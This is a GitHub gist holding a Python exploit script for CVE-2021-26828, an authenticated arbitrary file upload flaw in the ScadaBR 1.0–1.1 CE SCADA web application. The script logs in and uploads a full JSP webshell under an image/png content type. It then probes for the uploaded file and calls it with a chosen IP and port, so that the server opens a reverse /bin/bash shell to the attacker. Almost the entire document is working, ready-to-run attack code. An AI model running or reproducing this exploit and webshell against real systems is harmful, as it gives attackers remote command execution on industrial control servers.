Skip to content

Instantly share code, notes, and snippets.

@voidvxvt

voidvxvt/CVE-2021-26828-linux.py

Created January 6, 2025 18:43
Show Gist options
  • Save voidvxvt/719c34da30a644b822765729be648985 to your computer and use it in GitHub Desktop.
Save voidvxvt/719c34da30a644b822765729be648985 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
CVE-2021-26828-linux.py
#!/usr/bin/python3
import requests
import argparse
import time
import sys
def parse_args():
parser = argparse.ArgumentParser(description="Exploit for CVE-2021-26828 in ScadaBR 1.0 ~ 1.1 CE.")
parser.add_argument("target_ip", help="target ip address")
parser.add_argument("target_port", help="target port")
parser.add_argument("username", help="username for login")
parser.add_argument("password", help="password for login")
parser.add_argument("reverse_ip", help="ip address for reverse shell")
parser.add_argument("reverse_port", help="port for reverse shell")
return parser.parse_args()
banner = r'''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ \______ \______ \ |
| \_____ \_/ ___\\__ \ / __ |\__ \ | | _/| _/ |
| / \ \___ / __ \_/ /_/ | / __ \| | \| | \ |
| /_______ /\___ >____ /\____ |(____ /______ /|____|_ / |
| \/ \/ \/ \/ \/ \/ \/ |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload (CVE-2021-26828) |
| > Original Exploit Author : Fellipe Oliveira |
| > Exploit for Linux Systems |
| > ported to python3 by void |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''
def main():
args = parse_args()
print(banner)
host = args.target_ip
port = args.target_port
username = args.username
password = args.password
rev_host = args.reverse_ip
rev_port = args.reverse_port
s = requests.session()
login_url = f'http://{host}:{port}/ScadaBR/login.htm'
print(f"[+] Trying to authenticate to {login_url}...")
s.post(
url= login_url,
data= {
'username': username,
'password': password
}
)
res = s.get( url= f'http://{host}:{port}/ScadaBR/view_edit.shtm' )
if res.status_code == 200:
print("[+] Successfully authenticated! :D")
else:
print("[x] Authentication failed :(")
sys.exit(0)
jsp_revshell = '''
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread {
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os) {
this.is = is;
this.os = os;
}
public void run() {
BufferedReader isr = null;
BufferedWriter osw = null;
try {
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {
osw.write(buffer, 0, lenRead);
osw.flush();
}
} catch (Exception e) {
System.out.println("exception: " + e.getMessage());
}
try {
if (isr != null)
isr.close();
if (osw != null)
osw.close();
} catch (Exception e) {
System.out.println("exception: " + e.getMessage());
}
}
}
%>
<h1>Payload JSP to Reverse Shell</h1>
<p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p>
<form method="get">
IP Address<input type="text" name="ipaddress" size=30 value="127.0.0.1"/>
Port<input type="text" name="port" size=10 value="1234"/>
<input type="submit" name="Connect" value="Connect"/>
</form>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
Socket sock = null;
Process proc = null;
if (ipAddress != null && ipPort != null) {
try {
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
System.out.println("socket created: " + sock.toString());
Runtime rt = Runtime.getRuntime();
proc = rt.exec("/bin/bash");
System.out.println("process /bin/bash started: " + proc.toString());
StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());
System.out.println("outputConnector created: " + outputConnector.toString());
StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());
System.out.println("inputConnector created: " + inputConnector.toString());
outputConnector.start();
inputConnector.start();
} catch (Exception e) {
System.out.println("exception: " + e.getMessage());
}
}
if (sock != null && proc != null) {
out.println("<div class='separator'></div>");
out.println("<p>Process /bin/bash, running as (" + proc.toString() + "), is connected to socket " + sock.toString() + ".</p>");
}
%>
'''
files = { 'backgroundImageMP': ( 'webshell.jsp', jsp_revshell, 'image/png' ) }
data = {
'view_name': '',
'view_xid': 'GV_369755',
'upload': 'Upload image',
'view.anonymousAccess': '0'
}
print('[>] Attempting to upload .jsp Webshell...')
res = s.post(
url= f"http://{host}:{port}/ScadaBR/view_edit.shtm",
files= files,
data= data
)
print('[>] Verifying shell upload...\n')
if res.status_code == 200:
print('[+] Upload Successfuly! \n')
for num in range(1, 1000):
jsp_revsh_path = f'http://{host}:{port}/ScadaBR/uploads/{num}.jsp'
res = s.get( url= jsp_revsh_path )
if res.status_code == 200:
print(f'[+] Webshell Found in: {jsp_revsh_path}')
print(f'[>] Spawning Reverse Shell ...')
s.get( url= f'{jsp_revsh_path}?ipaddress={rev_host}&port={rev_port}&Connect=Connect' )
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment